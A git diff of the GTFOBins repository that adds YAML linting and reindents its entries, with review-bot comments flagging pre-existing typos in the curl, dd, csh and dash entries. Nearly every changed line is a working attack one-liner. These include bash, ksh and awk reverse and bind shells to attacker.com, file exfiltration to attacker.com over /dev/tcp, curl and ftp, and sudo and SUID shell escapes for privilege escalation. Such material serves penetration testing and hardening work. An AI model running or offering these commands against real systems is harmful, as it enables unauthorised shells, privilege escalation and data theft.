diff --git a/.yamllint b/.yamllint new file mode 100644 index 0000000..d1e0270 --- /dev/null +++ b/.yamllint @@ -0,0 +1,3 @@ +extends: default +rules: + line-length: disable diff --git a/Makefile b/Makefile index a55dfdf..0193ca1 100644 --- a/Makefile +++ b/Makefile @@ -1,4 +1,4 @@ -.PHONY: serve serve-public bundle +.PHONY: serve serve-public bundle lint serve: bundle exec jekyll serve @@ -8,3 +8,6 @@ serve-public: bundle: bundle install + +lint: + yamllint . _gtfobins/*.md diff --git a/_config.yml b/_config.yml index ef0dac5..e5f5010 100644 --- a/_config.yml +++ b/_config.yml @@ -1,3 +1,4 @@ +--- title: GTFOBins exclude: ['/Gemfile', '/Makefile', '/README.md', '/CONTRIBUTING.md'] diff --git a/_data/functions.yml b/_data/functions.yml index cb15696..59a6f60 100644 --- a/_data/functions.yml +++ b/_data/functions.yml @@ -1,3 +1,4 @@ +--- execute-interactive: label: Interactive execute description: | diff --git a/_gtfobins/ash.md b/_gtfobins/ash.md index 0656272..61216d6 100644 --- a/_gtfobins/ash.md +++ b/_gtfobins/ash.md @@ -1,13 +1,13 @@ --- functions: execute-interactive: - - code: ash + - code: ash file-write: - - code: | - export LFILE=file_to_write - ash -c 'echo data > $LFILE' + - code: | + export LFILE=file_to_write + ash -c 'echo data > $LFILE' suid-enabled: - - code: "./ash" + - code: "./ash" sudo-enabled: - - code: sudo ash + - code: sudo ash --- diff --git a/_gtfobins/awk.md b/_gtfobins/awk.md index 90da062..3bf4517 100644 --- a/_gtfobins/awk.md +++ b/_gtfobins/awk.md 
@@ -1,34 +1,34 @@ --- functions: execute-interactive: - - code: awk 'BEGIN {system("/bin/sh")}' + - code: awk 'BEGIN {system("/bin/sh")}' reverse-shell-non-interactive: - - description: Run `nc -l -p 12345` on the attacker box to receive the shell. - code: | - RHOST=attacker.com - RPORT=12345 - awk -v RHOST=$RHOST -v RPORT=$RPORT 'BEGIN { - s = "/inet/tcp/0/" RHOST "/" RPORT; - while (1) {printf "> " |& s; if ((s |& getline c) <= 0) break; - while (c && (c |& getline) > 0) print $0 |& s; close(c)}}' + - description: Run `nc -l -p 12345` on the attacker box to receive the shell. + code: | + RHOST=attacker.com + RPORT=12345 + awk -v RHOST=$RHOST -v RPORT=$RPORT 'BEGIN { + s = "/inet/tcp/0/" RHOST "/" RPORT; + while (1) {printf "> " |& s; if ((s |& getline c) <= 0) break; + while (c && (c |& getline) > 0) print $0 |& s; close(c)}}' bind-shell-non-interactive: - - description: Run `nc target.com 12345` on the attacker box to connect to the shell. - code: | - LPORT=12345 - awk -v LPORT=$LPORT 'BEGIN { - s = "/inet/tcp/" LPORT "/0/0"; - while (1) {printf "> " |& s; if ((s |& getline c) <= 0) break; - while (c && (c |& getline) > 0) print $0 |& s; close(c)}}' + - description: Run `nc target.com 12345` on the attacker box to connect to the shell. + code: | + LPORT=12345 + awk -v LPORT=$LPORT 'BEGIN { + s = "/inet/tcp/" LPORT "/0/0"; + while (1) {printf "> " |& s; if ((s |& getline c) <= 0) break; + while (c && (c |& getline) > 0) print $0 |& s; close(c)}}' file-write: - - code: | - LFILE=file_to_write - awk -v LFILE=$LFILE 'BEGIN { print "data" > LFILE }' + - code: | + LFILE=file_to_write + awk -v LFILE=$LFILE 'BEGIN { print "data" > LFILE }' file-read: - - code: | - LFILE=file_to_read - awk '//' "$LFILE" + - code: | + LFILE=file_to_read + awk '//' "$LFILE" sudo-enabled: - - code: sudo awk 'BEGIN {system("/bin/sh")}' + - code: sudo awk 'BEGIN {system("/bin/sh")}' suid-limited: - - code: ./awk 'BEGIN {system("/bin/sh")}' + - code: ./awk 'BEGIN {system("/bin/sh")}' --- 
diff --git a/_gtfobins/base64.md b/_gtfobins/base64.md index 76f8551..0148a42 100644 --- a/_gtfobins/base64.md +++ b/_gtfobins/base64.md @@ -1,15 +1,15 @@ --- functions: file-read: - - code: | - LFILE=file_to_read - base64 "$LFILE" | base64 --decode + - code: | + LFILE=file_to_read + base64 "$LFILE" | base64 --decode suid-enabled: - - code: | - LFILE=file_to_read - ./base64 "$LFILE" | base64 --decode + - code: | + LFILE=file_to_read + ./base64 "$LFILE" | base64 --decode sudo-enabled: - - code: | - LFILE=file_to_read - sudo base64 "$LFILE" | base64 --decode + - code: | + LFILE=file_to_read + sudo base64 "$LFILE" | base64 --decode --- diff --git a/_gtfobins/bash.md b/_gtfobins/bash.md index 5665958..55f6814 100644 --- a/_gtfobins/bash.md +++ b/_gtfobins/bash.md 
@@ -1,55 +1,52 @@ --- functions: execute-interactive: - - code: bash + - code: bash reverse-shell-interactive: - - description: Run `nc -l -p 12345` on the attacker box to receive the shell. - code: | - export RHOST=attacker.com - export RPORT=12345 - bash -c 'bash -i >& /dev/tcp/$RHOST/$RPORT 0>&1' + - description: Run `nc -l -p 12345` on the attacker box to receive the shell. + code: | + export RHOST=attacker.com + export RPORT=12345 + bash -c 'bash -i >& /dev/tcp/$RHOST/$RPORT 0>&1' upload: - - description: Send local file in the body of an HTTP POST request. Run an HTTP - service on the attacker box to collect the file. - code: | - export RHOST=attacker.com - export RPORT=12345 - export LFILE=file_to_send - bash -c 'echo -e "POST / HTTP/0.9\n\n$(<$LFILE)" > /dev/tcp/$RHOST/$RPORT' - - description: Send local file using a TCP connection. Run `nc -l -p 12345 > "file_to_save"` - on the attacker box to collect the file. - code: | - export RHOST=attacker.com - export RPORT=12345 - export LFILE=file_to_send - bash -c 'cat $LFILE > /dev/tcp/$RHOST/$RPORT' + - description: Send local file in the body of an HTTP POST request. Run an HTTP service on the attacker box to collect the file. + code: | + export RHOST=attacker.com + export RPORT=12345 + export LFILE=file_to_send + bash -c 'echo -e "POST / HTTP/0.9\n\n$(<$LFILE)" > /dev/tcp/$RHOST/$RPORT' + - description: Send local file using a TCP connection. Run `nc -l -p 12345 > "file_to_save"` on the attacker box to collect the file. + code: | + export RHOST=attacker.com + export RPORT=12345 + export LFILE=file_to_send + bash -c 'cat $LFILE > /dev/tcp/$RHOST/$RPORT' download: - - description: Fetch a remote file via HTTP GET request. 
- code: | - export RHOST=attacker.com - export RPORT=12345 - export LFILE=file_to_get - bash -c '{ echo -ne "GET /$LFILE HTTP/1.0\r\nhost: $RHOST\r\n\r\n" 1>&3; cat 0<&3; } \ - 3<>/dev/tcp/$RHOST/$RPORT \ - | { while read -r; do [ "$REPLY" = "$(echo -ne "\r")" ] && break; done; cat; } > $LFILE' - - description: Fetch remote file using a TCP connection. Run `nc -l -p 12345 < "file_to_send"` - on the attacker box to send the file. - code: | - export RHOST=attacker.com - export RPORT=12345 - export LFILE=file_to_get - bash -c 'cat < /dev/tcp/$RHOST/$RPORT > $LFILE' + - description: Fetch a remote file via HTTP GET request. + code: | + export RHOST=attacker.com + export RPORT=12345 + export LFILE=file_to_get + bash -c '{ echo -ne "GET /$LFILE HTTP/1.0\r\nhost: $RHOST\r\n\r\n" 1>&3; cat 0<&3; } \ + 3<>/dev/tcp/$RHOST/$RPORT \ + | { while read -r; do [ "$REPLY" = "$(echo -ne "\r")" ] && break; done; cat; } > $LFILE' + - description: Fetch remote file using a TCP connection. Run `nc -l -p 12345 < "file_to_send"` on the attacker box to send the file. + code: | + export RHOST=attacker.com + export RPORT=12345 + export LFILE=file_to_get + bash -c 'cat < /dev/tcp/$RHOST/$RPORT > $LFILE' file-write: - - code: | - export LFILE=file_to_write - bash -c 'echo data > $LFILE' + - code: | + export LFILE=file_to_write + bash -c 'echo data > $LFILE' file-read: - - description: It trims trailing newlines and it's not binary-safe. - code: | - export LFILE=file_to_read - bash -c 'echo "$(<$LFILE)"' + - description: It trims trailing newlines and it's not binary-safe. + code: | + export LFILE=file_to_read + bash -c 'echo "$(<$LFILE)"' suid-enabled: - - code: "./bash -p" + - code: "./bash -p" sudo-enabled: - - code: sudo bash + - code: sudo bash --- diff --git a/_gtfobins/busybox.md b/_gtfobins/busybox.md index 7e387bb..7d22c7f 100644 --- a/_gtfobins/busybox.md +++ b/_gtfobins/busybox.md 
@@ -1,27 +1,25 @@ --- -description: | - BusyBox may contain many UNIX utilities, run `busybox --list-full` to check +description: BusyBox may contain many UNIX utilities, run `busybox --list-full` to check what GTFBins binaries are supported. Here some example. functions: execute-interactive: - - code: busybox sh + - code: busybox sh upload: - - description: Serve files in the local folder running an HTTP server. - code: | - export LPORT=12345 - busybox httpd -f -p $LPORT -h . + - description: Serve files in the local folder running an HTTP server. + code: | + export LPORT=12345 + busybox httpd -f -p $LPORT -h . file-write: - - code: | - LFILE=file_to_write - busybox sh -c 'echo "data" > $LFILE' + - code: | + LFILE=file_to_write + busybox sh -c 'echo "data" > $LFILE' file-read: - - code: | - LFILE=file_to_read - ./busybox cat "$LFILE" + - code: | + LFILE=file_to_read + ./busybox cat "$LFILE" suid-enabled: - - description: It may drop the SUID privileges depending on the compilation flags - and the runtime configuration. - code: "./busybox sh" + - description: It may drop the SUID privileges depending on the compilation flags and the runtime configuration. + code: "./busybox sh" sudo-enabled: - - code: sudo busybox sh + - code: sudo busybox sh --- diff --git a/_gtfobins/cat.md b/_gtfobins/cat.md index 0278a57..3781ffa 100644 --- a/_gtfobins/cat.md +++ b/_gtfobins/cat.md @@ -1,15 +1,15 @@ --- functions: file-read: - - code: | - LFILE=file_to_read - cat "$LFILE" + - code: | + LFILE=file_to_read + cat "$LFILE" suid-enabled: - - code: | - LFILE=file_to_read - ./cat "$LFILE" + - code: | + LFILE=file_to_read + ./cat "$LFILE" sudo-enabled: - - code: | - LFILE=file_to_read - sudo cat "$LFILE" + - code: | + LFILE=file_to_read + sudo cat "$LFILE" --- diff --git a/_gtfobins/crontab.md b/_gtfobins/crontab.md index 12ac6ae..6ec198c 100644 --- a/_gtfobins/crontab.md +++ b/_gtfobins/crontab.md 
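Review bot: The reflowed description on the first changed line of the busybox.md hunk still reads `GTFBins` and `Here some example`; since the line is being rewritten anyway it could become `what GTFOBins binaries are supported. Here are some examples.` Separately, the file-read entry runs `./busybox cat "$LFILE"` although it is not a SUID entry; every other file-read in this change (cat.md, cut.md, head.md) uses the bare binary name and reserves `./` for the suid-* entries, so `busybox cat "$LFILE"` would be the consistent form. Both points predate this commit, which only reindents those lines.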
@@ -1,9 +1,9 @@ --- functions: execute-non-interactive: - - description: The commands are executed according to the crontab file edited via the `crontab` utility. - code: crontab -e + - description: The commands are executed according to the crontab file edited via the `crontab` utility. + code: crontab -e sudo-enabled: - - description: The commands are executed according to the crontab file edited via the `crontab` utility. - code: sudo crontab -e + - description: The commands are executed according to the crontab file edited via the `crontab` utility. + code: sudo crontab -e --- diff --git a/_gtfobins/csh.md b/_gtfobins/csh.md index e37cb53..07716b7 100644 --- a/_gtfobins/csh.md +++ b/_gtfobins/csh.md @@ -1,13 +1,13 @@ --- functions: execute-interactive: - - code: csh + - code: csh file-write: - - code: | - export LFILE=file_to_write - ash -c 'echo data > $LFILE' + - code: | + export LFILE=file_to_write + ash -c 'echo data > $LFILE' suid-enabled: - - code: "./csh -b" + - code: "./csh -b" sudo-enabled: - - code: sudo csh + - code: sudo csh --- diff --git a/_gtfobins/curl.md b/_gtfobins/curl.md index 3ad8be7..c14cc1b 100644 --- a/_gtfobins/curl.md +++ b/_gtfobins/curl.md 
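Review bot: The file-write entry in the csh.md hunk invokes `ash -c 'echo data > $LFILE'`, which looks like a copy of ash.md's entry rather than a csh technique; the page documents csh, so the line presumably should read `csh -c 'echo data > $LFILE'`. The dash.md hunk that follows has the same `ash -c` line under its file-write entry. This commit only reindents those lines, so the mismatch is pre-existing, but it is worth correcting while the files are being touched.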
@@ -1,21 +1,20 @@ --- functions: upload: - - description: Send local file with an HTTP POST request. Run an HTTP service on - the attacker box to collect the file. - code: | - URL=http://attacker.com/ - LFILE=file_to_send - curl -X POST -d @$file_to_send $URL + - description: Send local file with an HTTP POST request. Run an HTTP service on the attacker box to collect the file. + code: | + URL=http://attacker.com/ + LFILE=file_to_send + curl -X POST -d @$file_to_send $URL download: - - description: Fetch a remote file via HTTP GET request. - code: | - URL=http://attacker.com/file_to_get - LFILE=file_to_save - curl $URL -o $LFILE + - description: Fetch a remote file via HTTP GET request. + code: | + URL=http://attacker.com/file_to_get + LFILE=file_to_save + curl $URL -o $LFILE file-read: - - description: The file path must be absolute. - code: | - LFILE=/tmp/file_to_read - curl file://$LFILE + - description: The file path must be absolute. + code: | + LFILE=/tmp/file_to_read + curl file://$LFILE --- diff --git a/_gtfobins/cut.md b/_gtfobins/cut.md index 8c255b9..c9afd76 100644 --- a/_gtfobins/cut.md +++ b/_gtfobins/cut.md @@ -1,15 +1,15 @@ --- functions: file-read: - - code: | - LFILE=file_to_read - cut -d "" -f1 "$LFILE" + - code: | + LFILE=file_to_read + cut -d "" -f1 "$LFILE" suid-enabled: - - code: | - LFILE=file_to_read - ./cut -d "" -f1 "$LFILE" + - code: | + LFILE=file_to_read + ./cut -d "" -f1 "$LFILE" sudo-enabled: - - code: | - LFILE=file_to_read - sudo cut -d "" -f1 "$LFILE" + - code: | + LFILE=file_to_read + sudo cut -d "" -f1 "$LFILE" --- diff --git a/_gtfobins/dash.md b/_gtfobins/dash.md index 724a3dc..b1dc72f 100644 --- a/_gtfobins/dash.md +++ b/_gtfobins/dash.md 
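Review bot: In the curl.md hunk the upload entry assigns `LFILE=file_to_send` but the command on the next line references `$file_to_send`, which is never assigned, so `-d @$file_to_send` expands to a bare `-d @` and the entry does not do what its description says; the line should read `curl -X POST -d @$LFILE $URL`. The hunk only reindents the line, so the mismatch predates this commit.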
@@ -1,13 +1,13 @@ --- functions: execute-interactive: - - code: dash + - code: dash file-write: - - code: | - export LFILE=file_to_write - ash -c 'echo data > $LFILE' + - code: | + export LFILE=file_to_write + ash -c 'echo data > $LFILE' suid-enabled: - - code: "./dash -p" + - code: ./dash -p sudo-enabled: - - code: sudo dash + - code: sudo dash --- diff --git a/_gtfobins/dd.md b/_gtfobins/dd.md index 4c8eb8d..192bfc2 100644 --- a/_gtfobins/dd.md +++ b/_gtfobins/dd.md @@ -1,11 +1,11 @@ --- functions: file-write: - - code: | - LFILE=file_to_write - echo "data" | dd of=$LFILE + - code: | + LFILE=file_to_write + echo "data" | dd of=$LFILE file-read: - - code: | - LFILE=file_to_read - dd if=LFILE + - code: | + LFILE=file_to_read + dd if=LFILE --- diff --git a/_gtfobins/diff.md b/_gtfobins/diff.md index 0fc0308..6e24b86 100644 --- a/_gtfobins/diff.md +++ b/_gtfobins/diff.md @@ -1,15 +1,15 @@ --- functions: file-read: - - code: | - LFILE=file_to_read - diff --line-format=%L /dev/null $LFILE + - code: | + LFILE=file_to_read + diff --line-format=%L /dev/null $LFILE suid-enabled: - - code: | - LFILE=file_to_read - ./diff --line-format=%L /dev/null $LFILE + - code: | + LFILE=file_to_read + ./diff --line-format=%L /dev/null $LFILE sudo-enabled: - - code: | - LFILE=file_to_read - sudo diff --line-format=%L /dev/null $LFILE + - code: | + LFILE=file_to_read + sudo diff --line-format=%L /dev/null $LFILE --- diff --git a/_gtfobins/ed.md b/_gtfobins/ed.md index 9683b83..2e84659 100644 --- a/_gtfobins/ed.md +++ b/_gtfobins/ed.md @@ -1,23 +1,21 @@ --- functions: execute-interactive: - - code: | - ed - !/bin/sh + - code: | + ed + !/bin/sh file-write: - - code: | - ed file_to_write - w + - code: | + ed file_to_write + w file-read: - - code: 'ed file_to_read - -' + - code: ed file_to_read sudo-enabled: - - code: | - sudo ed - !/bin/sh + - code: | + sudo ed + !/bin/sh suid-limited: - - code: | - ./ed - !/bin/sh + - code: | + ./ed + !/bin/sh --- 
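Review bot: The file-read entry in the dd.md hunk has `dd if=LFILE` without the `$`, so dd opens a file literally named `LFILE` rather than the path assigned on the line above; it should be `dd if=$LFILE`, or `dd if="$LFILE"` to match the quoting the file-read entries in cat.md and cut.md use. The commit only reindents this line, so the typo is pre-existing.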
diff --git a/_gtfobins/emacs.md b/_gtfobins/emacs.md index d758d40..36fbe6b 100644 --- a/_gtfobins/emacs.md +++ b/_gtfobins/emacs.md @@ -1,17 +1,15 @@ --- functions: execute-interactive: - - code: emacs -Q -nw --eval '(term "/bin/sh")' + - code: emacs -Q -nw --eval '(term "/bin/sh")' file-write: - - code: | - emacs file_to_write - C-x C-s + - code: | + emacs file_to_write + C-x C-s file-read: - - code: 'emacs file_to_read - -' + - code: emacs file_to_read suid-enabled: - - code: ./emacs -Q -nw --eval '(term "/bin/sh -p")' + - code: ./emacs -Q -nw --eval '(term "/bin/sh -p")' sudo-enabled: - - code: sudo emacs -Q -nw --eval '(term "/bin/sh")' + - code: sudo emacs -Q -nw --eval '(term "/bin/sh")' --- diff --git a/_gtfobins/env.md b/_gtfobins/env.md index 71b1e78..0dc5e64 100644 --- a/_gtfobins/env.md +++ b/_gtfobins/env.md @@ -1,9 +1,9 @@ --- functions: execute-interactive: - - code: env /bin/sh + - code: env /bin/sh suid-enabled: - - code: "./env /bin/sh -p" + - code: ./env /bin/sh -p sudo-enabled: - - code: sudo env /bin/sh + - code: sudo env /bin/sh --- diff --git a/_gtfobins/expand.md b/_gtfobins/expand.md index 8ff7fbd..3c00ddf 100644 --- a/_gtfobins/expand.md +++ b/_gtfobins/expand.md @@ -1,18 +1,16 @@ --- -description: 'The read file content is corrupted by replacing tabs with spaces. - -' +description: The read file content is corrupted by replacing tabs with spaces. functions: file-read: - - code: | - LFILE=file_to_read - expand "$LFILE" + - code: | + LFILE=file_to_read + expand "$LFILE" suid-enabled: - - code: | - LFILE=file_to_read - ./expand "$LFILE" + - code: | + LFILE=file_to_read + ./expand "$LFILE" sudo-enabled: - - code: | - LFILE=file_to_read - sudo expand "$LFILE" + - code: | + LFILE=file_to_read + sudo expand "$LFILE" --- diff --git a/_gtfobins/expect.md b/_gtfobins/expect.md index 3e9602b..541aa47 100644 --- a/_gtfobins/expect.md +++ b/_gtfobins/expect.md 
@@ -1,9 +1,9 @@ --- functions: execute-interactive: - - code: expect -c 'spawn /bin/sh;interact' + - code: expect -c 'spawn /bin/sh;interact' suid-enabled: - - code: "./expect -c 'spawn /bin/sh -p;interact'" + - code: ./expect -c 'spawn /bin/sh -p;interact' sudo-enabled: - - code: sudo expect -c 'spawn /bin/sh;interact' + - code: sudo expect -c 'spawn /bin/sh;interact' --- diff --git a/_gtfobins/find.md b/_gtfobins/find.md index fc1386a..bb85e04 100644 --- a/_gtfobins/find.md +++ b/_gtfobins/find.md @@ -1,9 +1,9 @@ --- functions: execute-interactive: - - code: find . -exec /bin/sh \; -quit + - code: find . -exec /bin/sh \; -quit suid-enabled: - - code: "./find . -exec /bin/sh -p \\; -quit" + - code: ./find . -exec /bin/sh -p \; -quit sudo-enabled: - - code: sudo find . -exec /bin/sh \; -quit + - code: sudo find . -exec /bin/sh \; -quit --- diff --git a/_gtfobins/flock.md b/_gtfobins/flock.md index 28a0ec3..22c0937 100644 --- a/_gtfobins/flock.md +++ b/_gtfobins/flock.md @@ -1,9 +1,9 @@ --- functions: execute-interactive: - - code: flock -u / /bin/sh + - code: flock -u / /bin/sh suid-enabled: - - code: "./flock -u / /bin/sh -p" + - code: ./flock -u / /bin/sh -p sudo-enabled: - - code: sudo flock -u / /bin/sh + - code: sudo flock -u / /bin/sh --- diff --git a/_gtfobins/fmt.md b/_gtfobins/fmt.md index 79b69ac..88f783d 100644 --- a/_gtfobins/fmt.md +++ b/_gtfobins/fmt.md 
@@ -1,18 +1,16 @@ --- -description: 'The read file content is not binary-safe. - -' +description: The read file content is not binary-safe. functions: file-read: - - code: | - LFILE=file_to_read - fmt -pNON_EXISTING_PREFIX "$LFILE" + - code: | + LFILE=file_to_read + fmt -pNON_EXISTING_PREFIX "$LFILE" suid-enabled: - - code: | - LFILE=file_to_read - ./fmt -pNON_EXISTING_PREFIX "$LFILE" + - code: | + LFILE=file_to_read + ./fmt -pNON_EXISTING_PREFIX "$LFILE" sudo-enabled: - - code: | - LFILE=file_to_read - sudo fmt -pNON_EXISTING_PREFIX "$LFILE" + - code: | + LFILE=file_to_read + sudo fmt -pNON_EXISTING_PREFIX "$LFILE" --- diff --git a/_gtfobins/fold.md b/_gtfobins/fold.md index cf98e21..e05e3e4 100644 --- a/_gtfobins/fold.md +++ b/_gtfobins/fold.md @@ -1,15 +1,15 @@ --- functions: file-read: - - code: | - LFILE=file_to_read - fold -w99999999 "$LFILE" + - code: | + LFILE=file_to_read + fold -w99999999 "$LFILE" suid-enabled: - - code: | - LFILE=file_to_read - ./fold -w99999999 "$LFILE" + - code: | + LFILE=file_to_read + ./fold -w99999999 "$LFILE" sudo-enabled: - - code: | - LFILE=file_to_read - sudo fold -w99999999 "$LFILE" + - code: | + LFILE=file_to_read + sudo fold -w99999999 "$LFILE" --- diff --git a/_gtfobins/ftp.md b/_gtfobins/ftp.md index c80f99a..3a522dc 100644 --- a/_gtfobins/ftp.md +++ b/_gtfobins/ftp.md 
@@ -1,23 +1,23 @@ --- functions: execute-interactive: - - code: | - ftp - !/bin/sh + - code: | + ftp + !/bin/sh upload: - - description: Send local file to a FTP server. - code: | - RHOST=attacker.com - ftp $RHOST - put file_to_send + - description: Send local file to a FTP server. + code: | + RHOST=attacker.com + ftp $RHOST + put file_to_send download: - - description: Fetch a remote file from a FTP server. - code: | - RHOST=attacker.com - ftp $RHOST - get file_to_get + - description: Fetch a remote file from a FTP server. + code: | + RHOST=attacker.com + ftp $RHOST + get file_to_get sudo-enabled: - - code: | - sudo ftp - !/bin/sh + - code: | + sudo ftp + !/bin/sh --- diff --git a/_gtfobins/gdb.md b/_gtfobins/gdb.md index 413739b..3718449 100644 --- a/_gtfobins/gdb.md +++ b/_gtfobins/gdb.md @@ -7,11 +7,11 @@ description: | [version 3](/gtfobins/python3/). functions: execute-interactive: - - code: gdb -nx -ex '!sh' -ex quit + - code: gdb -nx -ex '!sh' -ex quit file-write: - - code: | - LFILE=file_to_write - gdb -nx -ex "dump value $LFILE \"data\"" -ex quit + - code: | + LFILE=file_to_write + gdb -nx -ex "dump value $LFILE \"data\"" -ex quit sudo-enabled: - - code: sudo gdb -nx -ex '!sh' -ex quit + - code: sudo gdb -nx -ex '!sh' -ex quit --- diff --git a/_gtfobins/head.md b/_gtfobins/head.md index 00a98a5..68f282f 100644 --- a/_gtfobins/head.md +++ b/_gtfobins/head.md @@ -1,15 +1,15 @@ --- functions: file-read: - - code: | - LFILE=file_to_read - head -c1G "$LFILE" + - code: | + LFILE=file_to_read + head -c1G "$LFILE" suid-enabled: - - code: | - LFILE=file_to_read - ./head -c1G "$LFILE" + - code: | + LFILE=file_to_read + ./head -c1G "$LFILE" sudo-enabled: - - code: | - LFILE=file_to_read - sudo head -c1G "$LFILE" + - code: | + LFILE=file_to_read + sudo head -c1G "$LFILE" --- diff --git a/_gtfobins/ionice.md b/_gtfobins/ionice.md index 4582300..9597bea 100644 --- a/_gtfobins/ionice.md +++ b/_gtfobins/ionice.md 
@@ -1,9 +1,9 @@ --- functions: execute-interactive: - - code: ionice /bin/sh + - code: ionice /bin/sh suid-enabled: - - code: "./ionice /bin/sh -p" + - code: ./ionice /bin/sh -p sudo-enabled: - - code: sudo ionice /bin/sh + - code: sudo ionice /bin/sh --- diff --git a/_gtfobins/jq.md b/_gtfobins/jq.md index c894c84..87989ad 100644 --- a/_gtfobins/jq.md +++ b/_gtfobins/jq.md @@ -1,15 +1,15 @@ --- functions: file-read: - - code: | - LFILE=file_to_read - jq -Rr . "$LFILE" + - code: | + LFILE=file_to_read + jq -Rr . "$LFILE" suid-enabled: - - code: | - LFILE=file_to_read - ./jq -Rr . "$LFILE" + - code: | + LFILE=file_to_read + ./jq -Rr . "$LFILE" sudo-enabled: - - code: | - LFILE=file_to_read - sudo jq -Rr . "$LFILE" + - code: | + LFILE=file_to_read + sudo jq -Rr . "$LFILE" --- diff --git a/_gtfobins/ksh.md b/_gtfobins/ksh.md index 1ebc62f..434607a 100644 --- a/_gtfobins/ksh.md +++ b/_gtfobins/ksh.md 
@@ -1,59 +1,56 @@ --- functions: execute-interactive: - - code: ksh + - code: ksh reverse-shell-interactive: - - description: Run `nc -l -p 12345` on the attacker box to receive the shell. - code: | - export RHOST=attacker.com - export RPORT=12345 - ksh -c 'ksh -i > /dev/tcp/$RHOST/$RPORT 2>&1 0>&1' + - description: Run `nc -l -p 12345` on the attacker box to receive the shell. + code: | + export RHOST=attacker.com + export RPORT=12345 + ksh -c 'ksh -i > /dev/tcp/$RHOST/$RPORT 2>&1 0>&1' upload: - - description: Send local file in the body of an HTTP POST request. Run an HTTP - service on the attacker box to collect the file. - code: | - export RHOST=attacker.com - export RPORT=12345 - export LFILE=file_to_send - ksh -c 'echo -e "POST / HTTP/0.9\n\n$(cat $LFILE)" > /dev/tcp/$RHOST/$RPORT' - - description: Send local file using a TCP connection. Run `nc -l -p 12345 > "file_to_save"` - on the attacker box to collect the file. - code: | - export RHOST=attacker.com - export RPORT=12345 - export LFILE=file_to_send - ksh -c 'cat $LFILE > /dev/tcp/$RHOST/$RPORT' + - description: Send local file in the body of an HTTP POST request. Run an HTTP service on the attacker box to collect the file. + code: | + export RHOST=attacker.com + export RPORT=12345 + export LFILE=file_to_send + ksh -c 'echo -e "POST / HTTP/0.9\n\n$(cat $LFILE)" > /dev/tcp/$RHOST/$RPORT' + - description: Send local file using a TCP connection. Run `nc -l -p 12345 > "file_to_save"` on the attacker box to collect the file. + code: | + export RHOST=attacker.com + export RPORT=12345 + export LFILE=file_to_send + ksh -c 'cat $LFILE > /dev/tcp/$RHOST/$RPORT' download: - - description: Fetch a remote file via HTTP GET request. 
- code: | - export RHOST=attacker.com - export RPORT=12345 - export LFILE=file_to_get - ksh -c '{ echo -ne "GET /$LFILE HTTP/1.0\r\nhost: $RHOST\r\n\r\n" 1>&3; cat 0<&3; } \ - 3<>/dev/tcp/$RHOST/$RPORT \ - | { while read -r; do [ "$REPLY" = "$(echo -ne "\r")" ] && break; done; cat; } > $LFILE' - - description: Fetch remote file using a TCP connection. Run `nc -l -p 12345 < "file_to_send"` - on the attacker box to send the file. - code: | - export RHOST=attacker.com - export RPORT=12345 - export LFILE=file_to_get - ksh -c 'cat < /dev/tcp/$RHOST/$RPORT > $LFILE' + - description: Fetch a remote file via HTTP GET request. + code: | + export RHOST=attacker.com + export RPORT=12345 + export LFILE=file_to_get + ksh -c '{ echo -ne "GET /$LFILE HTTP/1.0\r\nhost: $RHOST\r\n\r\n" 1>&3; cat 0<&3; } \ + 3<>/dev/tcp/$RHOST/$RPORT \ + | { while read -r; do [ "$REPLY" = "$(echo -ne "\r")" ] && break; done; cat; } > $LFILE' + - description: Fetch remote file using a TCP connection. Run `nc -l -p 12345 < "file_to_send"` on the attacker box to send the file. + code: | + export RHOST=attacker.com + export RPORT=12345 + export LFILE=file_to_get + ksh -c 'cat < /dev/tcp/$RHOST/$RPORT > $LFILE' file-write: - - code: | - export LFILE=file_to_write - ksh -c 'echo data > $LFILE' + - code: | + export LFILE=file_to_write + ksh -c 'echo data > $LFILE' file-read: - - description: It trims trailing newlines. - code: | - export LFILE=file_to_read - ksh -c 'echo "$(<$LFILE)"' - - description: It trims trailing newlines. - code: | - export LFILE=file_to_read - ksh -c $'read -r -d \x04 < "$LFILE"; echo "$REPLY"' + - description: It trims trailing newlines. + code: | + export LFILE=file_to_read + ksh -c 'echo "$(<$LFILE)"' + - description: It trims trailing newlines. + code: | + export LFILE=file_to_read + ksh -c $'read -r -d \x04 < "$LFILE"; echo "$REPLY"' suid-enabled: - - code: "./ksh -p" + - code: ./ksh -p sudo-enabled: - - code: sudo ksh + - code: sudo ksh --- 
diff --git a/_gtfobins/ld.so.md b/_gtfobins/ld.so.md index 081ec5a..2a5cfcb 100644 --- a/_gtfobins/ld.so.md +++ b/_gtfobins/ld.so.md @@ -9,9 +9,9 @@ description: | ``` functions: execute-interactive: - - code: "/lib/ld.so /bin/sh" + - code: /lib/ld.so /bin/sh suid-enabled: - - code: "./ld.so /bin/sh -p" + - code: ./ld.so /bin/sh -p sudo-enabled: - - code: sudo /lib/ld.so /bin/sh + - code: sudo /lib/ld.so /bin/sh --- diff --git a/_gtfobins/less.md b/_gtfobins/less.md index d6d9044..d895060 100644 --- a/_gtfobins/less.md +++ b/_gtfobins/less.md @@ -1,22 +1,20 @@ --- functions: execute-interactive: - - code: | - less /etc/profile - !/bin/sh - - code: | - VISUAL="/bin/sh -c '/bin/sh'" less /etc/profile - v + - code: | + less /etc/profile + !/bin/sh + - code: | + VISUAL="/bin/sh -c '/bin/sh'" less /etc/profile + v file-read: - - code: 'less file_to_read - -' + - code: less file_to_read sudo-enabled: - - code: | - sudo less /etc/profile - !/bin/sh + - code: | + sudo less /etc/profile + !/bin/sh suid-limited: - - code: | - ./less /etc/profile - !/bin/sh + - code: | + ./less /etc/profile + !/bin/sh --- diff --git a/_gtfobins/ltrace.md b/_gtfobins/ltrace.md index b962133..f7b420b 100644 --- a/_gtfobins/ltrace.md +++ b/_gtfobins/ltrace.md @@ -1,7 +1,7 @@ --- functions: execute-interactive: - - code: ltrace -b -L /bin/sh + - code: ltrace -b -L /bin/sh sudo-enabled: - - code: sudo ltrace -b -L /bin/sh + - code: sudo ltrace -b -L /bin/sh --- diff --git a/_gtfobins/mail.md b/_gtfobins/mail.md index ec40e5a..c6f46d1 100644 --- a/_gtfobins/mail.md +++ b/_gtfobins/mail.md 
